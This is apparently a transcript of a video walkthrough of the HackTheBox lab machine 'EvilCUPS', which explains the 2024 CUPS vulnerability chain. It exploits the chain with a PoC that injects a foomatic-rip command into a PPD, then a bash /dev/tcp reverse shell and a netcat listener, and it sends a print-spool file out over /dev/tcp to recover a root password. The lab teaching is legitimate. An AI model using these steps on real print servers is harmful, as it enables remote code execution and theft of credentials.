What's going on YouTube? This is IPSec. We're doing EvilCUPS from HackTheBox, which is a non-competitive release, so we can do a video on it right away. The box is based on all the work EvilSocket did finding a vulnerability in CUPS, which is the main Linux print server, and by default, it listens on UDP port 631 on all hosts. And this caused it to get a very high CVSS score because anyone that could talk to that UDP socket could then create a printer on the host that would execute a command when something is printed to it. However, because it required something being printed, many people online kind of dismissed the high CVSS score because printing just doesn't happen on Linux all that often. There are ways to remotely trigger print jobs. In this box, we will use the CUPS management server that's listening on TCP 631 to print a test page and give us a shell on the box. With that shell, we will then view cached print jobs on the box and discover that someone printed the server's root password and recover that job, view it, and log into the box as root. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, as v enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it EvilCUPS, and then the IP address of 10.10.11.40. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's a Debian server. We also have the Internet Printing Protocol, IP, listening on port 631 TCP, and the banner tells us it's CUPS version 2.4. And then we have some web scripts of nmap running that tells us there is a web server on this interface. So let's go ahead and take a look at it. So I'm going to go to my browser, HTTP 10.10.11.40.631, and we get the CUPS management interface. And now normally this isn't exposed to all interfaces. It's normally just bound on the loopback or local host. But on a lot of just appliances that also have print servers, let's say like Synology NASes, it is exposed on all interfaces because not many people are on the console of those like appliance print server things. So occasionally you do see it exposed to the internet. I think if you search Shodan right now, there'd be like 70,000 just on the open internet. If we Google the whole banner of this, 242, it will tell us like when this was released. So I'm going to Google open printing CUPS 242 changelog. And we see it was, on Google, it told us it was in 2022. There's a fix for CV in 2022, but this page was published May 26, 2022. And also, if we look at the footer here, the copyright is telling us 2022, and that's normally a good indicator at the last time a code has changed on a web server. Just this being open really isn't a huge vulnerability because there is authentication that behind dangerous actions. Like if we go to admin, we just get a forbidden. Sometimes it'll prompt you for credentials, which is just HTTP basic auth. And you just log in with local credentials. There's also a way to do Kerberos, things like that. But we're just a anonymous user right now. The one thing anonymous users can do is enumerate printers. So if we go to the printers, we can see there is one printer. The location is the server room. And if we click on it, we can do show completed jobs. And then we can see there is one job that has been completed. We can also click on this drop down and do like print a test page. And then if we look at the show completed jobs, we see there are now two jobs completed. And since we did this as anonymous user, it is disclosing the information. We can see anonymous created the job and the job's name is test page. We can't see anything about this job. This is going to be important later on in the box. But if we want to do something like, say, like delete or modify, it's probably going to just say forbidden because that's a admin functionality. So let's go ahead and talk about the elephant in the room. And that is the big CUPS vulnerability of this year, 2024, that happened like a week ago, right? If we wanted to, we could do sudo nmap -s capital U 10.10.11.40, and we have to specify port 631. Whenever I do UDP scans, I like scanning multiple ports because UDP doesn't have a good way to tell you if it's open or not. So I always like having a like control that I know this should respond closed. This one's open, so I know 631 UDP is listening, which is the case on a lot of just CUPS in general. This is going to be a very old protocol, but to explain it better, let's go ahead and navigate to the blog post talking about the vulnerability from the finder of this. We went to EvilSocket's blog. I'm sure you could Google like EvilSocket attacking CUPS or something like that, and you get over to this page. But I would recommend reading this entire thing because he does do a good job explaining it. I'm not going to because it is long and we're going to go over everything hands-on doing a demo, exploiting it, right? It really boils down to these 4 CVEs, and combined they get a CVSS score of like 9.8 or 9.9 from Red Hat. I think he does talk about it somewhere here. Let's see, CVSS. There we go. It's a 9.9 from Red Hat. But let's just talk about the CVEs. The first CVE is going to be CUPS browse D binds on UDP any. And this one is kind of odd because this is needed for CUPS browse D, right? The old protocol, well, the purpose of CUPS browse D is to be able to show you printers on the network, right? And the really old way to do this, like a decade ago, 2011, 2012, and things like that, was the printer would send a UDP broadcast message to the network on like port 631. CUPS browse D would pick that up. It would read that UDP packet and then say, okay, I'm going to go to that printer to download the PPD, the Postscript printer description file, and that lets it print to it, right? Newer ways use things like Avahi, Bonjour, ZeroConf, whatever you want to call like those new ways to discover things. And what really changed was the client sends a multicast DNS message out to the network, and then things respond to it. So the client's asking, hey, are there NT printers? The printers respond to it, and then it goes and downloads the PPD file. Whereas the CUPS browse D listening on port 631 UDP is really for printers initiating that broadcast. So kind of a small change there. And the fix here, if we went to CUPS browse D GitHub, I think we'll be able to see the actual fix commits relatively recently. All it does is disables this by default because, again, you can't really patch this because it's needed to function, right? That's the whole purpose of this. So if we go to this thing, the default browse protocol, all they're doing is defaulting to only DNS SSD, which I forget exactly what that stands for, but that's going to be using like Avahi, ZeroConf, Bonjour. I forget, there's other names people call those type of discovery things. But in the blog post, it also recommends disabling those because they're relatively insecure. So the first CVE is just about CUPS browse D. The next two are very similar. This is going to be libcupfilter and libppd. This one is reading data from a IPP server, the Internet Printing Protocol. It doesn't filter any bad characters or enough bad characters. So you can have like line breaks and add extra attributes. The libppd, this one is just when it writes attributes, it doesn't have sanitization. So we don't do sanitization on getting variables into the system. And we don't get do sanitization when we get them out of the system. So you could do them either place, and then this attack chain would be fixed. So that's what that is. And again, we're probably going to go over these again as we start exploiting them. And then the final one is going to be this fumatic rip. This, again, is going to be like one of those needed functionalities. It was a big thing back in like 2011 because there was a command injection, and kind of the fix was we're not going to use fumatic rip over the network, or at least we won't allow you to specify fumatic rip parameters over the network. But if print drivers want to put it in the PPD file and be installed locally, we'll let them, because what fumatic rip is it's like a universal converter, right? Printers don't accept documents of everything. I can't just send like a PDF or JPEG to a printer and have it print. Generally, it goes through some conversion. I'll probably convert it to a Postscript format and then send it to the printer. So fumatic rip is the way that the program does this. And it's probably easy to just Google, let's say, what do I want to Google exactly to pull this up? Fumatic rip, command line, issues maybe, and find an old issue or config on how it works. Fumatic rip, let's see. Fumatic rip, command line. If I just Google this, do we get anything? No. Everything's super recent. I don't want that. So I'm going to pause the video real quick, and we're going to get to a better page to showcase what fumatic rip is. Okay, so I did it on my host, and all I did was search fumatic rip command line GitHub, and I was clicking around, and I saw this one issue. And if we go to the issue, it kind of talks about how to properly, well, I guess I shouldn't say properly configure, but an example configuration. We give fumatic rip command line, and then they're doing some bunch of magic to do a Perl conversion before it sends to the printer. So the whole purpose of this is essentially it runs system on the parameter. So if we can inject this into a PPD file, then we can just put any command we want here, and then it's going to execute it when things are printed. So if we go back to this, this kind of like a feature, like that's no real fix to CUPS browse D because we need to listen on UDP any for us to actually use that legacy protocol. So the only real fix there is disabling CUPS browse D. These two actual vulnerabilities because it's allowing us to inject things into the PPD by just inserting bad characters. And then this one, I don't know exactly how you fix it because again, you're controlling a parameter in a config file that is just system. It's just a bad design, right? So let's go ahead and go to exploit these. I bet if we went to the CUPS page now, so if we do CUPS, that's Apple CUPS GitHub, there is a security advisory that has some source code that we could potentially use. However, I have found that the code didn't work that well. This is not it. Maybe it's in CUPS browse D. The downside with this is there's a lot of just projects and a lot of code to go through to chain all these things together. But I want to say CUPS browse D is where the security issue is, right here. So you can also read this. This is what was reported. And then there's source code here. But this source code, I had trouble getting it working just out of the box. It had both tabs and spaces, like copy and paste was bad. There are other few small things. So I have put my copy on my GitHub repo. So if you just go to GitHub IPSec and I called it EvilCUPS, you should be able to download this script. So let's just clone this to a box and then we can run it. So I'm going to go code, copy this, and then we can git clone, cd EvilCUPS. And then to run this, we're going to have to install the IPP server. So I'm going to do a python 3-m VM. So we're going to create our virtual environment so we can install Python libraries. So VM bin activate, pip3 install -r requirements.txt. And this will install the IPP server, right? If I just cat requirements.txt, you can see it. So let's go ahead and quickly go over this code to see exactly how it works. So if I go to evilcups.py, I'm going to go down to main real quick so we can see everything. The public POC had 3 for argv. I just added an argument for running a command. By default, it just ran a touch command. This just lets us put the reverse shell in standard in. So right here, we're going to stand up our Internet Printing Protocol server. This is a HTTP server, and it's going to handle all the attributes, building the PPD file for the client. But first, let's talk about the send browse D packet. And I'm actually going to comment this out real quick. So we're going to run the first thing first without starting up the IPP server so we can just see what the request looks like. So the browse D packet, this is going to be what tells the print server we're on the network and it should print from us. So what I'm going to do is run this exploit. So we can do python 3 EvilCUPS. It wants our IP address first. Then we do 10.10.11.40, which is the target. The command, it's not going to matter because I commented things out, so this code's not going to work. I just want to show you what the request looks like. And every time you attempt to add the printer, it's probably going to take about 30 seconds to get the request. Sometimes this is instantaneous. I think it's not working because there's not DNS on the server and it's like timing out or something. So we just got to wait the 30 seconds. And while I wait, I want to stand up a Wireshark so we can look at the UDP packet on the wire. So it should happen in about 5 seconds. We'll see the target connected, and then there we go. So this is the HTTP packet that gets sent. So what happened is we sent this UDP packet. I think this is this it? Hypertext. Did I not capture it? That's weird. Let's see, 1, 2, 3, 4, 5. I don't see any UDP here. Huh. Do I have a filter not capturing UDP? That's weird. So we sent a UDP packet, and then the server processed it, and inside that UDP packet was the following. Let's just go up to here. We sent the printer type of 2, the printer state of 3, Then we told it, hey, this is where the printer exists. And then we gave it the location, the info, and the model. And then it goes and sends a post and says, hey, we want to get all the attributes. I'm trying to find exactly where it is. It's not in the easiest to read format. There we go. Request attributes all. So that is CUPS reaching back to us to install things. Also in this, we have the exact kernel version that is running on the server. But yeah, that's that. So let's go ahead. Oh, I know I didn't capture the UDP because I wasn't running Wireshark when I sent the packet. That's why. So let's just, not Bluetooth. Stop. Yes. Let's go ton 0. There we go. So I'm going to uncomment our IP server. So now we'll respond with actual printer attributes. And the attributes we send are going to be all of this, right? So we use the Python library IP server just so we can put it in the correct format because it is a serialized format. I guess we can look at it in Wireshark when it goes. But these are going to be all the variables. And then at the very bottom, we're going to send one called print more info. And then this is where the CVEs come into play, right? So we talked about these two CVEs of it not validating or sanitizing the attributes. So we say, hey, we got to print more info. And then we put a line break in. And then we say, hey, here's this parameter and then this parameter, right? So we're just writing these lines directly into the postfix file. And that's where we inject our command. So after we get root on the box, we'll look at the PPD file. And I'm assuming this will make much more sense once you can see the config. But this is where that CV comes into play. So we start the line off with a single quote because we just want to insert a blank variable. So what it's going to do is like star print more info. And then this is where we have our inject. So we're going to put a single quote in, then the line break, and then we're going to just say, now do the foomatic rip command line, run bin bash, and then we do cups filter or whatever. Autocomplete's not fixing it. Cups filter 2. And then we do some stuff here and then leave that second apostrophe open. So when the what is the program libcups filter goes to read this variable, it will go ahead and add this double quote. And now this is the entire print more info thing that writes directly into the PPD file. I know it's probably not making much sense, but hopefully it will in hindsight once we finish the video. So let's get rid of all this stuff and run the exploit. And I probably should have ran that first because it does take 30 seconds. And the command we want to run is going to be a bash-c, bash-i. Let's do, I think this, yeah, like this. And then dev tcp 10.10.14.8, 9001, 0 and 1, like that. And then we can close these out. I don't know if I got these quotes in the wrong order or not. I don't think it actually matters. So we'll run this, and I'm going to wait the 30 seconds. And while we wait, we can look at the packet we sent to the box, right? So this is the packet. We sent the CUPS thing. There's the type. It's idle, the URI, location, make and model. And to understand all of this, you could just go to any of like the CUPS RFCs and understand it. So if we went to like open source Apple CUPS browse the protocol, I think this is how I found it. Let's go here. Maybe this, spec browsing. Yep, this is it. And this says how it works, right? So we have type 1 is a hex digit. Or first we should say, this is the whole packet. So we send the type, then WSP, which means white space, then the state, then white space, then URI, white space, location, white space, info, you get it, right? So type 1 and hex digit. So that is why in my script, when we send this, where is it? The send browse D packet. Printer type's going to be 2. And then I have the : X in my F string. So this makes it hex, right? And then the state is going to be 3, which I think is idle. And that's why this one is just an ASCII, right? Because the RFC didn't tell me to do hex. It really doesn't matter because 3 is the same as 3 in hex. It's not until we go after 9 that things really differ, but I just want to try to obey this. Then we have the URI. So after that, we put the URL. And then the really weird thing is location info make model. It says quoted string. So that's why you see when I do print a location info model, these are strings and quotes, right? So that is the packet. We should have had 30 seconds pass, the target connected, and we sent the payload. So let's go ahead now and navigate back to 631. If we go to /printers, we see there is an extra printer, this hacked one. So let's go here. Let's stand up our reverse shell. So NC LVMP 9001. And I'm going to do print test page. We sent it. And now it hit my fumatic rip command line that I sent. And we got a shell because that's what we told it to do is run code. So let's now upgrade our shell. So we'll do Python 3 import pty spawn bin bash. Like that. There we go. st2i raw minus echo, foreground, enter twice. So now we have a reverse shell as the LP user. And let's export term equal X term so I can clear the screen. So what can we do as this user? Well, remember at the start of the video, we talked about there being 2 printers or this cannon, and there was a completed job. So what we want to do is figure out where this file is. The easiest way to do that, I found, is just to stand up CUPS myself. You could also do a lot of Googling, but if you install CUPS, or it's probably already installed, and then enable it. So we'll do systemctl CUPS start. Is it start CUPS? Yeah, start CUPS, wrong way. And now I can go to my localhost 631, and I have my own server here, right? So if I go to printers, I got my physical printer behind me. I don't want to use that one though. What I want to use is just one I make. So I'm going to go back over to my command line and I'm going to run lp admin. And then we can say, I think it's -p for destination. That's going to be, I think, the queue name. I'm going to call it the void. -E is going to enable it right away. And then -v is going to be the device URI. I'm just going to say this device is dev null. So anything we print to this just immediately goes into the void. So now if I go back to this page, we can see a new printer here. And if I go to print a test page, we have the void -8. If I do show completed jobs, there it is. So I'm going to switch to the root user of my box. And then we could just do some forensics. This is where kind of Googling helps. If we Googled, let's see, CUPS cache print jobs, maybe it'll tell us the directory. You could probably just guess the directory if you understand Linux structure. But Google tells us var spool CUPS cache. So let's do cd var spool CUPS cache. No file directory. That should exist. Oh. Yeah, it's just var spool CUPS. There's no cache. There's also var cache CUPS. And if we do that, then we could also look at the jobs cache. So if we cat this job.cache, we can see the like metadata around that, like the name, the destination created. But the actual print job is here. And the format of this is a little bit weird. It is D and then 5 digits and then 3 digits. This is going to be the print job. So if I go back to my print server, this is print job 8. And then this is going to be the page. So if we went back to our shell, looks like our shell died. So the print job's only going to last so long, and then it'll kill the job. And when it kills the job, it will probably kill your shell with it. So to fix that, what we do is a nohup. So I'm going to go back to this, and we're going to do nohup. And then we'll do a space ampersand at the end. So this is going to automatically background it. And it's going to take 30 seconds for this to come back. And there is some automation on the box itself to clean up bad printers. So once it goes into a bad state, it's bad state being a paused state, it will automatically delete the printer. If you do this in the real world, you may have trouble and you may have to go at it at a different IP address because it's going to be just in a state that it won't accept a new PPD file and you won't be able to get code execution. It's really odd. So keep that in mind. We just put a new shell in. Let's do nc. Whoops. I want to listen on 9001. There it is. We can go back to this one. Printers, the hacked. Stand up my test page, and we have this. So if I do a ps-ef-forest, we can explain exactly what happened. Let's see. Python 3 C, we have to upgrade our shell real quick. And I'll probably do this again at the very end of the video. Maybe. Let's see. We did Python 3, stty raw echo foreground. Okay, ps-ef-forest. Let's do less capital S. We have to export a term. And I also need to get the size of my TTY, rows 28, columns 110. Forest less S. There we go. So what happened? This is going to be a print job. This is the test page, right? Fumatic rip runs a command. We can see it's defunct here, but this before was a reverse shell. And this one spawned a new process. So because we did nohup with the ampersand, this is us. We did not have this before. It's hard to show unless we want to get a whole new shell without nohup. Before we are all under this one print job. So when it killed this job because it just timed out, it took our shell with it. But now we have forked to a new parent PID, which is just one with nohup. When it goes and kills this job, it's not going to kill this one. So when you're exploiting this, that nohup definitely makes it a lot more stable. So where were we? We were looking at the cache, right? So we're going to go to var spool cups. So if I do cd var spool cups, then we do ls, we can't, permission denied. And the reason why we can't is we only have the executable bit set on this directory. Root owns it. We're group LP. It's only executable. So that means we can go in the directory but not list the contents. However, if we look at the files inside of this, we can see the D file is going to be readable by the LP user. And this is the cache we want. So we just have to know the file name. So if we go back to this, we can see we have to go to the printer. So the canon, show completed jobs. We want job 1. So if I do cat D and then 4 zeros 1, and then we want page 1, we get the postfix. And it's telling us the title of the page is pass.txt and giving us this string. So chances are it's going to be the password, right? But let's just copy this file back to our box and then convert it to PDF so we can actually view what the page looks like, because this is in Postscript format. So I'm going to exit this and we can say nc lvmp 9001, and I'll call this job.ps. And then we can cat that file to dev tcp 10.10.14.8 9001. Now we have the file here, and we can use a command called ps2pdf. And we can say job ps job.pdf. And if we open job.pdf, we have the page that was printed. So we got password.txt and the password, which is break glass root EvilCUPS. So the whole theory behind this is the admin is sitting at his desk in his cube, and he wants to go log into a box physically because maybe like it's not responding. He needs to log into the local terminal. So what he did was just print the password to the server room printer, grabs the piece of paper, and they can go log in, right? I've seen a lot of people do that back when I was an admin. I even did that occasionally. Probably not the best practice in hindsight, but yeah. So let's now use that password to log in. So we can do su dash, or we could have SSH'd as root. but we get logged in. So now that we're root, let's go and explore the box a little bit more to understand what happened. I know I said it would make more sense in hindsight, so let's go to Etsy and then CUPS PPD. And then let's look at that PPD file. This is what we had sent, right? So if we look at it, we have AP supplies, and I think AP supplies is actually what print more info means. It's just a quote, a double quote, and then another double quote. And this line is what we're sending right here. This print more info somehow gets translated to AP supplies. I'm not sure exactly why it does, but it does. And then we put the double quote here. So this one double quote right here is ours. And then we put a line break in so we could write this next line, which is the foomatic rip command line. And then we put our command here. And then we wrote the next line of cups filter 2. And then, oh, I guess we have a space. We probably don't need that space, or maybe that's another CV. That space is probably important. I'm guessing because this has a space, this one will override this one. I'm not actually positive. I'm confused here. I guess we can try taking the space away and trying the exploit again. Let's see. Let's do that. Is that space needed? So what I'm doing here is a PSEF forest. Oh, I'm root right now. Let's see. If I go back here, okay, the printer's probably gone. Normally when this error comes, at least on this box, that's the printer reaching back. We don't handle something, and that's when the printer goes in the pause state. So I'm thinking it should be cleaned up. Yes, I don't even have a PPD file here anymore. So it automatically cleaned itself up. If I run this command again, and now we don't have the space here, and let's see. We can leave print more info there. That's fine. Actually, let's do, I don't want to change two things. Let's just change one. I don't know if that AP more supplies thing would error if it's not a string or integer. I don't know exactly what that wants. So let's just keep it simple. Run the script again. We'll wait 30 seconds. And then we'll see if we can get a shell without that one space. And I guess I should have did this without nohup, so you could look at what the PSEF force looks like. I guess we'll fail one more time and then show you that piece, and then probably wrap up the video. So we got another 8 seconds for this to reach back, and then the printer will come. So we see nothing here. 30 seconds hits, that DNS query times out, and now we suddenly have this. So if we look at hacked, let's go to foomatic rips. Now this cup filter doesn't have a space. Let's see what happens here. Let's go to the hacked. Did I listen? I did. So let's go NC. Print test page. It's sent, and we still got a shell. So I don't know exactly what that space is doing. Maybe that's just an error in the script, but it doesn't appear to matter. So I'm just going to do this again, because I think for some reason, if you didn't do the upgrade to a shell and it cleaned up the job, it would not actually kill your shell. It's really bizarre. Whoa, I don't want that. FG. I went into a different tmux session. Did I close tmux completely? There we go. This is what I want. STTY raw minus echo foreground. There we go. But I think because we do the proper shell, when it kills the parent process, like the process gets a thread kill message and then decides to exit itself. If we don't do the proper shell, maybe it gets that thread kill and says, I don't know what to do, and doesn't exit. Can't really explain it. Didn't play with it that much, but yeah. So I'm just going to wait for this to error. It's probably going to be 2 to 3 minutes. So I'm going to pause the video and then we'll resume. Okay. So it has errored. This shell did not die because we did use the nohup. So let's go ahead, and what we want to do is change this to not use nohup so we can see exactly what the call tree looks like. So we're going to do this bash again. And then while we wait, it's going to take again 30 seconds. What do we want to look at? We can actually change this real quick. Let's do a 1 here, or I can do please subscribe. There we go. So I'm going to put a field here to prove that we are writing this double quote right here. So that's the purpose of that. Oh, shoot. I don't know if this is going to work now, because I had to restart the server for it actually to take that change. Let's see what happens. Let's go back to the printer. We can do a print test page. Unable to print. The class does not exist. So we definitely dorked something up. Thankfully, we have a root shell. The printer doesn't exist. /printers doesn't exist at all. So I think us putting that please subscribe caused it not to parse. Not a huge surprise. So let's change this to just an integer, and maybe that will work better. If not, then we'll give up trying to prove that that one double quote is ours. I guess maybe we could have done a space. A space is probably going to be a safe character as well. But yeah, let's just wait for these seconds to elapse. And now that I'm thinking about it, it may not be that. I think that space colon matters, because I changed this and then I didn't restart the print server, so the PPD file never updated. Oh, that is painful. That is probably what happened. So let's go back, and I probably have to clean this up. Oh, we got it. It's there. Search. Okay. Printers, sometimes they just work, right? We sent the job, we got the everything's working. Okay. Ignore that tangent. Let's now quickly do the Python 3 C import pty spawn bin bash, and we're going to look at the PPD file after this because I'm not exactly sure what just happened. stty raw minus echo foreground enter. stty rows 28 calls 110. I think that's it. Export term equals x term. Okay, so it's kind of wonky because these are old ones, right? These are from my nohup. I'd have to exit the whole shell to get rid of those. But this is what the call trace of our print looks like, right? We have this hacked sh is defunct. This is probably the sh executing foomatic rips. And then it executes the reverse shell here, and we go down. So when this job gets cleaned up, this shell goes away. These two are from my nohups. So let's close this one. We don't need it anymore. This one, we want to look at the PPD file real quick. So if I look at this, let's go to foomatic. The space colon doesn't seem to matter, and the AP supplies, please subscribe, that worked. So that proves that we wrote this one double quote, then put the line break and did everything, right? So that's all good. Let's exit this quickly, and hopefully it hasn't been the 5 minutes for the cleanup to run, so we still have the shell. Awesome. Let's BSEF less dash capital S. There we go. So this is what it normally looks like if you don't have any nohups, right? So as soon as it comes, it's going to go kill a shell. Yeah. So I hope you guys enjoyed the video. That's probably going to be it. I don't think there's anything else. So take care. And I guess one last thing. We can talk about this again since we went over this at the beginning, but hopefully now that you have the background of the video, it may make more sense, right? So this CUPS browse D, the vulnerability is it's listening on all hosts on port 631, but it needs to. That's how it functions, right? This is a legacy protocol though, so you can disable this and nothing happens. You don't want to disable the whole browse D itself because while this is a legacy protocol, it listening on UDP 631 is legacy. Now it defaults to DNS SSD. So if I go back to CUPS browse D, look at the commits, not issues, Commits. Too slow. What's going on? Commits. I'm going way too fast. There we go. Default browsing protocol. So now when distros pull this source code and compile, it's not going to listen on 631 because CUPS is removed there, right? It's only using DNSSD, which is the multicast DNS one. It's not perfect, but it will limit us from being able to attack it across the network, right? If we're still on the local network, we can respond to that MDNS request and say, hey, here's the URI for a printer, go download it and get code execution, right? Well, as long as nothing else is patched, right? We can still make the CUPS server reach out to us to install a printer if we're on the local network because we can respond to the multicast DNS request that like Avahi or Bonjour would send. So that's what the browsed is. Libs cup filter, this is when our IPP server sends or print attributes. We can put a line break and it doesn't sanitize it. So we can put some attributes in the file that it doesn't expect. This one, when it writes that file, it doesn't do sanitization. So this actually makes it into the file that goes on disk. And this one is just foomatic rip command line accepts an argument and then runs system against that to run the command. So that's just dangerous. The whole report is talking about like how bad the experience was reporting this. And I kind of get it from both sides, right? This is going to be one of those normal situations where a lot of people don't know how to fix the vulnerability when it's vulnerable by design. There wasn't really like a memory corruption or something that they could fix in the source code, right? This is just bad design and the filter and the browsed. So I can see why like developers will kind of drag their feet if they don't fully understand security because they're just like, how do I fix this? I can't. It's vulnerable by design. We have to get rid of it or something. So they get rid of this one. And then like, well, we can't get rid of foomatic rip command line because so many printers use it. If we do, no one will be able to print. So we're kind of screwed, right? It's one of those just odd scenarios that that happens quite a bit when you do pen testing. The security people always just say, well, it should be fixed. If it's not fixed, then we can run code. That's like, what are you doing? And then the devs are like, I don't know how to fix it. It's a bad situation to get into, but hopefully that kind of sheds some light on why like Twitter may have been like negative around this entire thing. The other thing is many people say that people have to print to the printer in order to execute it. But as we've shown here, there are other ways to trigger print jobs. You can use your imagination. I know there's other ways I could exploit it where if I didn't have access to this, if this was just listening on localhost, there may be a way to interact with the page still, maybe like cross-site scripting. So it's no longer completely void of any user interaction. But if they click on a malicious link, then you can send them the print driver, then have them, their browser go to localhost and print the test page that way and get code execution. There's just a big attack surface here. So with all that being said, I'm going to wrap the video up. Take care all, and I'll see you all next time.